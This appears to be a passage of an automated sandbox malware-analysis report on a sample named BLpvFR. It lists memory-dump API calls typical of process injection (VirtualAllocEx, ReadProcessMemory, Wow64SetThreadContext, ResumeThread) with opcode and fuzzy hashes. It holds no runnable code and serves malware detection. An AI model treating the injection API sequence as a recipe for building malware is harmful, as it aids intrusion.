                                                              • Opcode Fuzzy Hash: 25c6eb74d411c026550829d9c127749434082406baef08c1a8904dc3db76ccbb
                                                              • Instruction Fuzzy Hash: 112125718003499FDB10CFAAC881AEEFBF5FF48310F108429E518A7240DB799915CBA5

                                                              Control-flow Graph (image not reproduced): function 6ff6c49-6ff6d14, calls Wow64SetThreadContext
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FF6CCE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 63f461fdafb0bea982bc078da5f8b787a43167eb3d544ccc0bf9368013e2d659
                                                              • Instruction ID: e617ab5ae3fc5ff712a64a824faa11b051285c8870bcaf2f23fc6b080a272b17
                                                              • Opcode Fuzzy Hash: 63f461fdafb0bea982bc078da5f8b787a43167eb3d544ccc0bf9368013e2d659
                                                              • Instruction Fuzzy Hash: 26213871D103099FEB10DFAAC8857EFBBF4EF88214F14842AE559A7240CB789945CFA5

                                                              Control-flow Graph (image not reproduced): function 6ff6ed8-6ff6f9e, calls ReadProcessMemory
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FF6F58
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 1d79d97493e201d244f688bc6309af21343949cd5504a57e3de735407000d31a
                                                              • Instruction ID: b9cdac3a55e8ff1d46a992753f703d67eef3b86fee0062bd8c94ef67b8b53adc
                                                              • Opcode Fuzzy Hash: 1d79d97493e201d244f688bc6309af21343949cd5504a57e3de735407000d31a
                                                              • Instruction Fuzzy Hash: 772114718003499FDB10CFAAC880BEEFBF5FF48310F14842AE519A7250D7799911CBA5

                                                              Control-flow Graph (image not reproduced): function 6ff6c50-6ff6d14, calls Wow64SetThreadContext
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FF6CCE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 6dc93d3345f039bc503f86dbfacfcd7560f50feae6a5814309b4cad5cbc7e0b6
                                                              • Instruction ID: 7841b322d3b10071fe739e3d43e283f5e0734ed68bf146b9719edecd1cac399a
                                                              • Opcode Fuzzy Hash: 6dc93d3345f039bc503f86dbfacfcd7560f50feae6a5814309b4cad5cbc7e0b6
                                                              • Instruction Fuzzy Hash: E9213571D103098FDB10CFAAC8857AEBBF4EF88214F14842AD559A7240CB789945CFA5

                                                              Control-flow Graph (image not reproduced): function d0d59f-d0d65a, calls DuplicateHandle
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D627
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: d78f6795973f40e2b0d3c976b96d0f1d67eba1ed40e81f6d13429d0eba9cb2ae
                                                              • Instruction ID: e2bc634c93227be351a2eee2901632c61798e942f8c5d1a3dfbcd5d3b27a29ed
                                                              • Opcode Fuzzy Hash: d78f6795973f40e2b0d3c976b96d0f1d67eba1ed40e81f6d13429d0eba9cb2ae
                                                              • Instruction Fuzzy Hash: 6721E2B5900248EFDB10CFAAD884ADEFBF5EB48310F14841AE918A7350C379A940CFA5
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D627
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: ddc1641e325f8d0094acecdfece7a2475fb222712650bca0fb7d5bd327545198
                                                              • Instruction ID: 77724e918e4aef4bd19f27da5231db5183b9feb5f4a15f79ba465e9a029fcea0
                                                              • Opcode Fuzzy Hash: ddc1641e325f8d0094acecdfece7a2475fb222712650bca0fb7d5bd327545198
                                                              • Instruction Fuzzy Hash: 1B21C4B5900348DFDB10CFAAD884ADEFBF9EB48310F14841AE958A7350D379A954CF65
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF6D96
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 98a40da92d3315e1619f24fdb35a29a3bdd7f7f26712a10ba8e27f1df4be079e
                                                              • Instruction ID: e740bece6e1a758611feec4b527b6f639841de8afd1e4c9456db952fd647b1df
                                                              • Opcode Fuzzy Hash: 98a40da92d3315e1619f24fdb35a29a3bdd7f7f26712a10ba8e27f1df4be079e
                                                              • Instruction Fuzzy Hash: D41144769003499FDB20DFAAC845BDFBBF5AF48320F248819E559A7250CB75A940CBA1
                                                              APIs
                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,059527DA,?,?,?,?,?), ref: 0595287F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1586739897.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5950000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateFromIconResource
                                                              • String ID:
                                                              • API String ID: 3668623891-0
                                                              • Opcode ID: baed72e989de9640e0230eea6361c710639c328e37cb0e4a654339ce8213bbb9
                                                              • Instruction ID: b6c0b7c359ae30c39cf6c63e3765534906c280f2b5acf23bd809450686e3295a
                                                              • Opcode Fuzzy Hash: baed72e989de9640e0230eea6361c710639c328e37cb0e4a654339ce8213bbb9
                                                              • Instruction Fuzzy Hash: F8113AB5800349DFDB10CF9AC844BDEBFF8EB48320F14841AEA54A7250C379A954CFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 109f05f087b004474201921af6d1c0bfc78fe441d83cc46e99d258c46d9eda06
                                                              • Instruction ID: a37d80b74c836fa92930ea90fd7164578bd9fcd3ab58b0f4fdccf9eeb7165c72
                                                              • Opcode Fuzzy Hash: 109f05f087b004474201921af6d1c0bfc78fe441d83cc46e99d258c46d9eda06
                                                              • Instruction Fuzzy Hash: DB115871D003488FDB20DFAAD8457DFFBF5EF88214F248829D519A7240CB79A945CBA5
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF6D96
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 01924204dd7675a1b368aaf3d37f118d35f1361925ce6f1a1241dc18748cfe05
                                                              • Instruction ID: 35bc6d6323ead1b0511ce09b21ac0477f442e9e3fac6f34a9a01f17b83bb081a
                                                              • Opcode Fuzzy Hash: 01924204dd7675a1b368aaf3d37f118d35f1361925ce6f1a1241dc18748cfe05
                                                              • Instruction Fuzzy Hash: CB1126718003499FDB20DFAAC844BDFBBF5AF48320F248819E519A7250CB75A540CBA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: bd53c1ce69653d275d82bec4a6d1f29e12d9073f599da941b2f67dd1957fb9b9
                                                              • Instruction ID: d464b30a0a0d6418d6ac1865654d8322a4963c4ee33612c1994409fb19874e4b
                                                              • Opcode Fuzzy Hash: bd53c1ce69653d275d82bec4a6d1f29e12d9073f599da941b2f67dd1957fb9b9
                                                              • Instruction Fuzzy Hash: 53113671D003488FDB20DFAAC84579FFBF5AF88324F248829D519A7250CB79A941CBA5
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FF9DE5
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a2a62d108208f4ba861aaabbe66306a98ca9b4192458c09e28d5752026fff892
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B326
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 93f9c5aa72fc3bd6f1d5b663cc6aa474b1157cd3a8a9b43a0b57c53ba043740d
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B326
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: fdc5e6c53d1e5648b1642c3fd59a7a5b790d324bfb6869e851b0d34bc2d379b6
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06FF9DE5
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: fd79f7647772801ff366cf44c39ccf5ac093f904929e4fba72478ed3f6b8541a
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b461e5e7855a6acdcafa19234fef427c079ee641f6a30aeeed26d5f6e79eda6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571693767.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a9d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64d4a16761288b974e06c6a7cf9cbd3ba1b86bfb8ef26077e1eb9a8efad2db68
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571693767.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a9d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21acb93e24e15a95e07091f200764ee86239bc43e4c5c452174949b9e00a6e59
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b19e9629ae2a45af91cb4feebdfdae2294816b10c19ee78c4e2481a8da91d1b7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1571542480.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a8d000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20913c63533fd7cc3b815d75e6fc72fa0d07d3661a37acc58fd89365af311677

                                                              Execution Graph

                                                              Execution Coverage:11.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:19
                                                              Total number of Limit Nodes:4
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9917a4640474b3d8627dcca824fa99a0c6a94f6dfb21ddd93005a5e8ab215f44
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a50a9cf5576cc35b9f4dbd816de0e9bc3fcba7b2568e7c3e09bd2b84b24c0d67

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0af9a07853d0548a3fa40c93617a75426fd48da30e1fb6899d205c6ba68f5ce4
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19441e07c4f82cab6d2285b8c2a7db0e788f2e6c0337c520144d35edc6e9d617
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8f5bec882474aaf2caa323f9898a46a947a8a5ea834129cb60e0b500061310f

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3959819982.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_6890000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2543bca9ccc0f17d26b8c7d0a1de451eb7825dbe2c7da8cbbfa1d4c1f08bf79

                                                              Control-flow Graph

                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0689EA9F
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3959819982.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_6890000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 92f81d0ace5d000429101198597587d0443c56fac80b18b3008163520bac7bc0

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bf10c8d93c68e70ab4fe8e671a83f7ac47752304c2738ba2886c6f22d3a667c
                                                              • Instruction ID: 1eba62b3f205ef9469f8a59426722e44e065347335554454059175722ea4af60
                                                              • Opcode Fuzzy Hash: 3bf10c8d93c68e70ab4fe8e671a83f7ac47752304c2738ba2886c6f22d3a667c
                                                              • Instruction Fuzzy Hash: 2D124931721206DBDB16BA7CE44426C33A6FBC9315F504939E106CB395EF39EC4A8BA5
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daa3c6ec0ab7dec13c945d8330b388ef065f385027d6ec927d61d41f435789b6
                                                              • Instruction ID: 048580483cb9ec876ea3884b5d3dac6ae607b8c81d1250107d0b39bd7caad000
                                                              • Opcode Fuzzy Hash: daa3c6ec0ab7dec13c945d8330b388ef065f385027d6ec927d61d41f435789b6
                                                              • Instruction Fuzzy Hash: FFA17C70E2124ACFEB10EFA9D8817DDBBF5BF88314F148129D914EB294EB759845CB81
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5eef59286e442af0764a09f3fdedaac99bad64c7cebc3ce126f0b8076d6e8656
                                                              • Instruction ID: 3397e3c6ca4460b427a495081ec8741fe09e213e160fc4378e03a5fae506e0bd
                                                              • Opcode Fuzzy Hash: 5eef59286e442af0764a09f3fdedaac99bad64c7cebc3ce126f0b8076d6e8656
                                                              • Instruction Fuzzy Hash: 4AA18C70E2124ACFDF14EFA8D8817DEBBF1BF98714F148129E514A7294EB749846CB81
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5314fd6d9d7d7f9b3cb612b8319bfe174dde092b6c31ccb7e90464aaa83ef363
                                                              • Instruction ID: cf7315a0a1177c240c84e8074581fc46bc8bcd381504d10f16f4b866d3e945f6
                                                              • Opcode Fuzzy Hash: 5314fd6d9d7d7f9b3cb612b8319bfe174dde092b6c31ccb7e90464aaa83ef363
                                                              • Instruction Fuzzy Hash: C7516B34721205CFDB14EB68C558AAD7BB6AF89704F2040A9E506EB3E1DB75DC41CBA1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d60ad901404687cbc83ee0f821d122b936824403470414ac38b904c9b6289dab
                                                              • Instruction ID: 5c1c397dbb68faa657d6dcce55c00a9899ce5f9806885706e26aa5240a5d7d3f
                                                              • Opcode Fuzzy Hash: d60ad901404687cbc83ee0f821d122b936824403470414ac38b904c9b6289dab
                                                              • Instruction Fuzzy Hash: 4A513D71A01209DFDB14DF69E88479DFBB2FF88310F14C16AEA099B395E7709945CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: da5440bb5fe3b2a36a8ff03179e662bea0a4784000da4f8d689bd1764b8c3c4d
                                                              • Instruction ID: b3234af05cabf9ea6a4963a92e55623e40e0ad0640fec4a169acbad9c3c45f42
                                                              • Opcode Fuzzy Hash: da5440bb5fe3b2a36a8ff03179e662bea0a4784000da4f8d689bd1764b8c3c4d
                                                              • Instruction Fuzzy Hash: A35131B4D21219CFEB18DFA9C885B9DBBF1BF48300F14812AD915AB391D774A844CB95
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04802d243b0847493e0afe0205532f810dd34b0ce9bacc8da79d926d4d31cb31
                                                              • Instruction ID: bbcac7dde6694b6eb09c0a08f58a31909d3be19345d2835708da8541b1a4bc45
                                                              • Opcode Fuzzy Hash: 04802d243b0847493e0afe0205532f810dd34b0ce9bacc8da79d926d4d31cb31
                                                              • Instruction Fuzzy Hash: 2D512070D21219CFEB18DFA9C884B9DBBB1BF48310F14812AE915AB391D774A844CB95
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d37aa60d5208949e291fa0e93852b96ca99803f57a03d1ddc7b8e4bf98e5b34
                                                              • Instruction ID: fd190a57e866c738615e080c4594b36d7920552300aa63b4c656572d64325647
                                                              • Opcode Fuzzy Hash: 0d37aa60d5208949e291fa0e93852b96ca99803f57a03d1ddc7b8e4bf98e5b34
                                                              • Instruction Fuzzy Hash: 4451D833611285CFC706FB7CF8849993BB2B7967047049AAED0444B36EFB316906DBA1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ddb8770a51311537cf13b80a3aa2307cdf22d6baccd8f5fb3e6414bd7d2767e
                                                              • Instruction ID: 0113eacc305110407d085d9e76e6091224ae4d5143c1f891a6ce33a1aaae5159
                                                              • Opcode Fuzzy Hash: 9ddb8770a51311537cf13b80a3aa2307cdf22d6baccd8f5fb3e6414bd7d2767e
                                                              • Instruction Fuzzy Hash: 7051C633611285CFC706FF6CF8849993BB2B79A7047049AAED0444B36EFB716905DBA1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf747774ec740f77f8f2fc3c1695fa77a19b6093a6db139a2771ed18ba89dd9c
                                                              • Instruction ID: 06403b6cb133fc7ead48e751e26ff6bea59d9cc9606410d6590eea16f527c3cc
                                                              • Opcode Fuzzy Hash: cf747774ec740f77f8f2fc3c1695fa77a19b6093a6db139a2771ed18ba89dd9c
                                                              • Instruction Fuzzy Hash: E5315231E2120ADBDB15EFA9D4407AEB7B2FF85300F208525E505EB381EB75AD41CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4e8bc62c1318cac29a8236b31797006a182a24fd02ecc67d3ca4c75f92b3ba7
                                                              • Instruction ID: 41973fe1a94c410753ec93813b3266cb38d1bc563bb71db179d767896a289bac
                                                              • Opcode Fuzzy Hash: a4e8bc62c1318cac29a8236b31797006a182a24fd02ecc67d3ca4c75f92b3ba7
                                                              • Instruction Fuzzy Hash: D441FEB4D11349DFEB14DFA9C880ADEBBF5BF48300F14842AE819AB250DB759945CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e32ff995cb29a74d9676213eda83488b9954b3196bfcba1e610d7c38962dfa2
                                                              • Instruction ID: 30e265ee7989b5e6c5a9d6e54dbe7b46c25572425e5f0f130514d40c7fe821b8
                                                              • Opcode Fuzzy Hash: 8e32ff995cb29a74d9676213eda83488b9954b3196bfcba1e610d7c38962dfa2
                                                              • Instruction Fuzzy Hash: 2A315031E2121ADBDB16DFB9C4517AEB7B2FF85300F208429E905FB291EB759941CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3945213793.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1280000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7590b647fafe88ee19724ffdb3fa652396e18dd090fa423a90d1871c7c93161c
                                                              • Instruction ID: 9d66f5c8625f447a57307f37665b41fafcd41cbcce1c8ade0121cdbe645db880
